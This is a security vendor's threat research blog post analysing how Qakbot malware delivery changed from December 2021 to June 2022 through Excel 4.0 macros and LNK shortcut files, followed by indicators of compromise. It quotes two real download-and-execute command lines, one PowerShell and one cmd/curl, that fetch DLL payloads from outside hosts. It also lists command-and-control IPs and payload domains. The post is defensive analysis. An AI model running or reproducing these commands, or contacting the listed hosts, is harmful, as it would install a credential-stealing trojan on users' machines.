Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Subscribe
Security Research

Rise in Qakbot attacks traced to evolving threat techniques

TARUN DEWAN, ADITYA SHARMA
July 12, 2022 - 11 min read

Active since 2008, Qakbot, also known as QBot, QuackBot and Pinkslipbot, is a common trojan malware designed to steal passwords. This pervasive threat spreads using an email-driven botnet that inserts replies in active email threads. Qakbot threat actors are also known to target bank customers and use the access they gain through compromised credentials to spy on financial operations and gain valuable intel. 

Summary

Qakbot has been a prevalent threat over the past 14 years and continues to evolve adopting new delivery vectors to evade detection. Zscaler Threatlabz has discovered a significant uptick in the spread of Qakbot malware over the past six months using several new techniques. Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0  to trick victims into downloading malicious attachments that install Qakbot. Other more subtle techniques are being deployed by threat actors to prevent automated detection and raise the odds that their attack will work, including obfuscating code, leveraging multiple URLs to deliver the payload, using unknown file extension names to deliver the payload, and altering the steps of the process by introducing new layers between initial compromise, delivery, and final execution.

Embedded as commonly-named attachments, Qakbot leverages ZIP archive file having embedded files such as Microsoft Office files, LNK, Powershell, and more. The screenshot in Fig. 1 below reveals a snapshot view of the spikes in Qakbot activity observed over the past six months.

 

Qakbot monitored during last 6 months in Zscaler Threatlabz

Figure1: Qakbot monitored during last 6 months in Zscaler Threatlabz

Zscaler automatically identifies and blocks files containing Qakbot malware for our customers, and provides them with the best possible solution to manage this evolving threat.

As an extra precaution against these types of threats, Zscaler recommends that organizations formally train users not to open email attachments sent from untrusted or unknown sources and encourage users to verify URLs in their browser address bar before entering credentials.

The Zscaler ThreatLabz team will continue to monitor this campaign, as well as others to help keep our customers safe and share critical information with the larger SecOps community to help stop the spread of active threats like Qakbot and protect people everywhere. The following sections dive into an in-depth analysis of this evolving threat and provide actionable indicators that security professionals can apply to identify and block Qakbot in their environments.

Technical analysis of evolving Qakbot techniques

ThreatLabz has observed threat actors using various different file names to disguise attachments designed to deliver Qakbot. Using common file naming formats that include a description, generated numbers, and dates, the files feature common keywords for finance and business operations, including compensation figures, metric reports, invoices and other enticing datasets. To the unsuspecting victim, these types of files may either appear like everyday items for business as usual or as a rare opportunity to look at data they would not normally see. Either way, the victim is likely to fall for the sense of urgency at a fresh data set or request and click the file to learn more about what is inside and how it pertains to them.

Malicious file name examples:

 

Calculation-1517599969-Jan-24.xlsb

Calculation-Letter-1179175942-Jan-25.xlsb

ClaimDetails-1312905553-Mar-14.xlsb

Compensation-1172258432-Feb-16.xlsb

Compliance-Report-1634724067-Mar-22.xlsb

ContractCopy-1649787354-Dec-21.xlsb

DocumentIndex-174553751-12232021.xlsb

EmergReport-273298556-20220309.xlsb

Payment-1553554741-Feb-24.xlsb

ReservationDetails-313219689-Dec-08.xlsb

Service-Interrupt-977762469.xlsb

Summary-1318554386-Dec27.xlsb

 

Analyzing the de-obfuscated code exposes how these malicious attachments use XLM 4.0 to hide their macros and evade detection by static analysis tools and automated sandboxes. Looking back over the past six months, our researchers observed a different kind of emails templates and standardized Office templates which are being used and changed only slightly in nearly all of the analyzed Qakbot samples. 

Email Templates:

Email Template Email Template Email Template Macro template

Figure 2 : Standard Email and Office templates used for Qakbot delivery in last six months

 

The following section provides a month by month overview of changes observed in Qakbot samples from December 2021 - May 2022:

Attack Chain

 

Excel Attack chain graph

Figure 3: Diagram of Qakbot delivery and execution via Microsoft Office attachments

December 2021: Qakbot XLM 4.0 snippet [Md5: 58F76FA1C0147D4142BFE543585B583F]

Once the user clicks “Enable Content” to view the attachment, the macro is activated to look for a subroutine with a pre-defined function, in this case starting with auto_open777777. In the next step of the sequence, the URLDownloadToFile function is imported and called to download  the malicious Qakbot Payload and drop it into the C:\ProgramData\ location on the victim’s machine with the filename .OCX which is actually Qakbot DLL. Then WinAPI EXEC from Excel4Macro directly executes the malicious payload or loads the payload using regsvr32.exe.

 

Qakbot XLM 4.0 snippet from December 2021

Figure 4: Qakbot XLM 4.0 snippet from December 2021

 

January 2022: Qakbot XLM 4.0 snippet [Md5: 4DFF0479A285DECA19BC48DFF2476123]

In the following snippet it executes macro code which is present in the cells from a hidden sheet named ‘EFFWFWFW'. This creates a  REGISTER and consistently calls functions to be performed, except in this example the threat actor has evolved the action to avoid detection via obfuscation. 

January XLM

Figure 5: Qakbot  XLM 4.0 snippet from January 2022

 

February 2022: Qakbot XLM 4.0 snippet [Md5: D7C3ED4D29199F388CE93E567A3D45F9]

Malware author leave code mostly unmodified. Create a folderOne using CreateDirectoryA WinAPI as shown in the following snapshot “C:\Biloa”.

February XLM

Figure 6: Qakbot  XLM 4.0 snippet from February 2022

March 2022: Qakbot XLM 4.0 snippet [Md5: 3243D439F8B0B4A58478DFA34C3C42C7] 

Observed change in the file system persistence level.

  • Change in payload drop location from C:\ProgramData\ to C:\Users\User\AppData\Local\[random_folder_name]\random.dll
  • Less obfuscation and code is much more readable.
  • Used option-s with regsvr32.exe so that it can install silently without prompting any kind of message. 

March XLM

Figure 7: Qakbot  XLM 4.0 snippet from March 2022

April 2022: XLM 4.0 snippet [Md5: 396C770E50CBAD0D9779969361754D69]

A new change is the observation of fully de-obfuscated code in Qakbot attachments. A similarity observed across Qakbot variants is the use of multiple URLs that can deliver the malicious payload, so that if any one URL goes down or is blocked, then the payload can still be delivered by another available URL. Additionally, it is common to see threat actors trying to evade detection from automated security scans by using unknown extensions on dropped payloads such as OCX, ooccxx, .dat, .gyp, and more.

April XLM

Figure 8: Qakbot  XLM 4.0 snippet from April 2022

May: Qakbot XLM 4.0 snippet [Md5: C2B1D2E90D4C468685084A65FFEE600E]

Observed change in the filename to ([0-9]{2,5}\.[0-9]{4,12}\.dat]. Additionally, Instead of 4-5 different download payload URLs, only one Qakbot download URL is identified.

May XLM

Figure 9: Qakbot  XLM 4.0 snippet from May 2022

 

Sandbox Office Report

Figure 10: Zscaler Sandbox Report Qakbot deliver by Malicious office attachment

Spreading factor through LNK files:

Attack Chain

LNK attack chain

Figure 11: Qakbot delivery and execution through LNK file

a) May 2022: Qakbot snippet of LNK file

Observed increase using the shortcut LNK filetype source with names like:  

  • report[0-9]{3}\.lnk
  • report228.lnk
  • report224.lnk

Observed change using powershell.exe to download the malware payload. 

Observed change and a clear sign of Qakbot evolving to evade updated security practices and defenses by loading the dll payload through rundll32.exe instead of regsvr32.exe.

Argument: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri https://oleitikocottages.com/r4i9PRpVt/S.png -OutFile $env:TEMP\766.dll;Start-Process rundll32.exe $env:TEMP\766.dll,NhndoMnhdfdf


b) June 2022: Qakbot snippet of LNK file

Observed change in execution flow and name of file name both change on LNK file type. Regsvr32.exe used while qakbot dll loading and injects to explorer.exe as well for communication to command and control server. Observed file names using the {5[0-9]{7,10}_[0-9][6,8]}\.lnk} LNK file type:

  • 51944395538_1921490797.zip
  • 52010712629_1985757123.zip
  • 52135924228_164908202.zip
  • 51107204327_175134583.zip

Argument: 'C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe /q /c echo 'HRTDGR' && MD "%ProgramData%\Username" && curl.exe -o %ProgramData%\Username\filename.pos 91.234.254.106/%random%.dat && ping -n 2 localhost && echo "MERgd" && echo "NRfd" && regsvr32 'C:\ProgramData\Username\filename.pos'

Through command prompt it downloads a payload and drops the file on the victim’s machine with a curl command. Here are some observed examples of the process:

CMD.EXE :

  • /q     : Turns the echo off.
  • /c     : Carries out the command specified by string and then stops.

CURL.EXE :

  • /o: Write to file

After that it loads the downloaded dll payload through regsvr32.exe and injects into the explorer.exe. Then performs further operations, including:

  • Checks for the presence of antivirus software.
  • Creates a RUN key for persistence in the system.
  • Creates scheduled tasks to execute the payload at a specific time.

Sandbox LNK behavior report

Figure 12: Zscaler Sandbox Report Qakbot deliver by LNK

More details on these findings are covered in the ThreatLabz Qakbot vectors blog.

Downloaded Qakbot DLL: 529fb9186fa6e45fd4b7d2798c7c553c from above mentioned LNK file.

The entry point of the executable is fully obfuscated using duplicate MOV operations.

Image

Figure 13: Obfuscated entry point

The following screenshot shows junk code obfuscating the script used to decode the payload.

 

Image

Figure 14: Code snippet for decoding the payload

Checks for Windows Defender Emulation using WinAPI GetFileAttributes “C:\INTERNAL\__empty”.

Image

Figure 15: Payload checking GetFileAttributesW

The sample also uses some flags like SELF_TEST_1 which appear to be for debugging purposes. 

Image

Figure 16: Setting flag for debugging purpose

 

Sandbox Qakbot DLL report

Figure 17: Zscaler Sandbox report for Qakbot DLL

Zscaler's multilayered cloud security platform detects indicators, as shown below:

LNK.Downloader.Qakbot

VBA.Downloader.Qakbot

The following details can be found in the Qakbot configuration file which we examined connecting to the server through explorer.exe.

BOTNET ID: Obama188

[+] C2 IPs:

1.161.123.53

101.108.199.194

102.182.232.3

103.116.178.85

103.207.85.38

104.34.212.7

106.51.48.170

108.60.213.141

109.12.111.14

109.178.178.110

111.125.245.116

117.248.109.38:21

120.150.218.241

120.61.2.215

121.7.223.45

124.40.244.115

140.82.49.12

140.82.63.183

143.0.219.6

144.202.2.175

144.202.3.39

148.0.56.63

148.64.96.100

149.28.238.199

172.115.177.204

173.174.216.62

173.21.10.71

174.69.215.101

175.145.235.37

176.205.23.48

176.67.56.94

177.209.202.242

177.94.57.126

179.158.105.44

180.129.108.214

182.191.92.203

186.90.153.162

187.207.131.50

187.251.132.144

189.146.87.77

189.223.102.22

189.253.206.105

189.37.80.240

189.78.107.163

190.252.242.69

191.112.4.17

191.34.120.8

193.136.1.58

196.203.37.215

197.87.182.115

197.94.94.206

201.145.165.25

201.172.23.68

201.242.175.29

208.101.82.0

208.107.221.224

210.246.4.69

 

Indicators of Compromise

[+] Payload URLs:

anukulvivah.comnobeltech[.]com.pk
griffinsinternationalschool.intierrasdecuyo[.]com.ar
tajir[.]comdocumentostelsen[.]com
wrcopias[.]com.brls[.]com.co
dk-chic[.]combendhardwoodflooring[.]com
stalwartnv[.]comdelartico[.]com
newportresearchassociates[.]comjindalfabtex[.]com
softwarela.orgasesorescontables[.]com.py
segurabr[.]com.brrenty.biz
hams.psalrabbat[.]com
glistenworld[.]comsonalifecare[.]com
act4dem.netbrandxo.in
stuttgartmed[.]comgmstrust.in
act4dem.netglistenworld[.]com
ananastours[.]comhostingdeguatemala[.]com
gmsss45c[.]comasiatrendsmfg[.]com
facturamorelos[.]comjnpowerbatteries[.]com
minimean[.]com1031taxfreexchange[.]com
pbxebike[.]comhigradeautoparts[.]com
parkbrightworldwideltd[.]comams.org.co
baalajiinfotechs[.]commomoverslegypte[.]com
recetasparaelalmapanama[.]comghssarangpur.org
wecarepetz[.]com.brbrothersasian[.]com
knapppizzabk[.]comwecarepetz[.]com.br
jeovajirelocacao[.]com.br7n7u.tk
amdpl.indabontechnologies.co.ke
bouncehouserentalmiami.netmahasewanavimumbai[.]com
hotelsinshillong.inbrothersasian[.]com
tamiltechhints[.]comitaw-int[.]com
tvtopcultura[.]com.brmadarasapattinam[.]com
desue.mxautocadbeginner[.]com
antwerpdiamond.netmarciomazeu.dev.br
ifongeek[.]comtunaranjadigital[.]com
avaniamore[.]comthecoursecreators[.]com
thecoursecreators[.]comdrishyamopticals[.]com
thewebinarchallenge[.]comiammyprioritylive[.]com
erekha.invegascraftbeertour[.]com
rommify.orgpbsl[.]com.gh
sathyaunarsabha.orgcourtalamarivuthirukovil.org
pbsl[.]com.ghapk.hap.in
outsourcingmr[.]comofferlele[.]com
courtalamarivuthirukovil.orgelchurritorojas[.]com
apk.hap.inklicc.co.tz
jinglebells.ngthebrarscafe[.]com
bigtv3d.inretroexcavaciones[.]com
aimwithnidhi.invizionsconsulting[.]com
gaurenz[.]comamarelogema[.]com.br
wiredcampus.inretroexcavaciones[.]com
elchurritorojas[.]comglobalwomenssummit2020[.]com
byonyks[.]comwfgproduction[.]com
wfgproduction[.]comciit.edu.ph
reachprofits[.]comcreativecanvas.co.in
vegascraftbeertour[.]comnightsclub[.]com
assistenciatecnicaembh24h[.]com.brtheinfluencersummit2021[.]com
grupoumbrella[.]com.brbjfibra[.]com
fra[.]com.arthewebinarstore[.]com
writeright.inaaafilador.eu
wlrinformatica[.]com.brminahventures[.]com
alternativecareers.inwvquali[.]com.br
aaafilador.eueventbriteclone.xyz
policepublicpress.inmarcofoods.in
longwood-pestcontrol[.]comlifecraze.in
viasalud.mxecsshipping[.]com
misteriosdeldesierto.pelgfcontabilidade[.]com.br
mariebeeacademy[.]commuthumobiles[.]com
teamone[.]com.satechmahesh.in
wiredcampus.inteamone[.]com.sa
furnitureion[.]comekofootball[.]com
comunidadecristaresgate[.]com.bryqsigo[.]com
mysuccesspoint.inkriworld.net
wiredcampus.intheinfluencerlaunch[.]com
mi24securetech[.]compalconsulting.net
attalian[.]comrudrafasteners[.]com
filmandtelevisionindia[.]comcloudberrie[.]com
brikomechanical[.]comideiasnopapel[.]com.br
neovation.sgatozinstrument[.]com
tecnobros8[.]comwalnut.ae
brikomechanical[.]comleaoagronegocios[.]com.br
sonhomirim[.]com.brwlrinformatica[.]com.br
wbbvet.ac.inboostabrain.in
narendesigns[.]comsla[.]com.ng
rstkd[.]com.brdelacumbrefm[.]com
leaoagronegocios[.]com.brdegreesdontmatter.in
strategicalliances.co.inlelokobranding.co.za
metrointl.netrajkotbusiness.in
titanhub.co.ukgrupothal[.]com.br
www.centerplastic[.]com.brpawnest[.]com
rightsupportmanagement.co.uksmiletours.net
leaseicemachine[.]comsegiaviamentos[.]com.br
virtualexpo.cactusfuturetech[.]comautovidriosrobin.anuncio-ads.cl
klearning.co.ukbestbuidan.mn
amicodelverde[.]comhunbuzz[.]com
prova.gaia.srlprodotti.curadelprato[.]com
prodotti.curadelprato[.]comdomenico[.]com.co
anukulvivah[.]comahmedabadpolicestories[.]com
ec.meticulux.netpent.meticulux.net
clerbypestcontrolllp.inorderingg.in
rylanderrichter[.]comtajir[.]com
searchgeo.org4md-uae[.]com
matjarialmomayz[.]comformularapida[.]com.br
carnesecaelpatron[.]com.mxbengallabourunion[.]com
alphanett[.]com.brragvision[.]com
secunets.co.keflameburger[.]com.mx
gph.lkabingdonhomes[.]com
agteacherscollege.ac.insis.edu.gh
impexlanka[.]comludoi[.]come.xyz
mufinacademy[.]com1031oilgasexchange[.]com
indexpublicidade[.]com.brhullriverinternationalltd[.]com
srgsdelhiwest[.]comproyectostam[.]com
waitthouseinc.orggomax.mv
ecotence.in.nettriplenetleaseproperty[.]com
brunocesar.meonlywebsitemaintenance[.]com
lbconsultores[.]com.cokindersaurus.in
guitarconnectionsg[.]comguestpostmachine[.]com
bagatiparamohiladegreecollege.edu.bdguitarconnectionsg[.]com
waitthouseinc.orgofferlele[.]com
cuddlethypet[.]comsrimanthexports[.]com
espetinhodotom[.]comluxiaafinishinglab[.]com
greyter[.]commoodle-on[.]com
niramayacare.inmakazadpharmacy[.]com
netleasesale[.]comnathanflax[.]com
erimaegypt[.]comclashminiwiki[.]com
topfivedubai[.]comskyorder.net
profitsbrewingnews[.]commotobi[.]com.bd
polistirolo.orgpalashinternationals[.]com
mayaconstructions.co.inmaexbrasil[.]com.br
mzdartworkservicesllc[.]comwalmondgroup[.]com
saffroneduworld[.]comlacremaynaty[.]com.mx
ifongeek[.]comgrowscaleandprofit[.]com
getishdonelive[.]cominfluencerlaunches[.]com
apk.hap.incalldekesha[.]com
vortex.cmspeakatiamp[.]com
thewebinarclinic[.]comthewebinarchecklist[.]com
sathyaunarsabha.orgoutsourcingmr[.]com
webdoweb[.]com.ngvortex.cm
future-vision[.]com.trbrunalipiani[.]com.br
ecotence.xyznimbus[.]com.qa
writeright.inlightnco.id
aidshivawareness.orgmetaunlimited.in
hearingaidbihar[.]combarcalifa[.]com.br
condominiosanalfonso.cltimelapse.ae
oladobeldavida[.]com.brmarcofoods.in
alternativecareers.inrsbnq[.]com
cobblux.pktafonego.org
chezmarblan[.]comcogitosoftware.co.in
devconstech[.]comcumipilek[.]com
daptec[.]com.brhydrical.mx
indiacodecafe[.]comecsshipping[.]com
skyorder.nettechmahesh.in
assimpresaroma.itcampandvillas[.]com
styleavail[.]comomtapovan[.]com
programandoavida[.]com.brindiacodecafe[.]com
bruno-music[.]comlaoaseanhospital.la
agbegypt[.]comcrimpwell.in
1031wiki[.]comstrategicalliances.co.in
nimbus[.]com.qavivanaweb[.]com.br
officeservicesjo.cfdinspiraanalytics.in
shareyourcake.orgprotocolostart[.]com
acertoinformatica[.]com.brinovex.in
devconstech[.]comdigizen.in
rajkotbusiness.indigizen.in
acertoinformatica[.]com.brrumbakids[.]com
boostabrain.incsnglobal.co
haskekudla[.]comkraushop[.]com
Mahalaxmibastralayanx.inchuckdukas[.]com

[+] Hashes

XLSB:

58F76FA1C0147D4142BFE543585B583F

4DFF0479A285DECA19BC48DFF2476123

D7C3ED4D29199F388CE93E567A3D45F9

3243D439F8B0B4A58478DFA34C3C42C7

396C770E50CBAD0D9779969361754D69

C2B1D2E90D4C468685084A65FFEE600E

LNK:

54A10B41A7B12233D0C9EACD11036954

E134136D442A5C16465D9D7E8AFB5EBE

7D0083DB5FA7DE50E620844D34C89EFC

C2663FCCB541E8B5DAA390B76731CEDE

Qakbot:

529FB9186FA6E45FD4B7D2798C7C553C

[+] Filenames:

Calculation-1517599969-Jan-24.xlsb
Calculation-Letter-1179175942-Jan-25.xlsb
ClaimDetails-1312905553-Mar-14.xlsb
Compensation-1172258432-Feb-16.xlsb
Compliance-Report-1634724067-Mar-22.xlsb
ContractCopy-1649787354-Dec-21.xlsb
DocumentIndex-174553751-12232021.xlsb
EmergReport-273298556-20220309.xlsb
Payment-1553554741-Feb-24.xlsb
ReservationDetails-313219689-Dec-08.xlsb
Service-Interrupt-977762469.xlsb
Summary-1318554386-Dec27.xlsb
W_3122987804.xlsb
A_1722190090.xlsb
AO_546764894.xlsb
Nh_1813197697.xlsb
LM_4170692805.xlsb
report228.lnk
report224.lnk
51944395538_1921490797.zip
52010712629_1985757123.zip
52135924228_164908202.zip
51107204327_175134583.zip

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

form submtited
Thank you for reading

Was this post useful?

Get the latest Zscaler blog updates in your inbox

By submitting the form, you are agreeing to our privacy policy.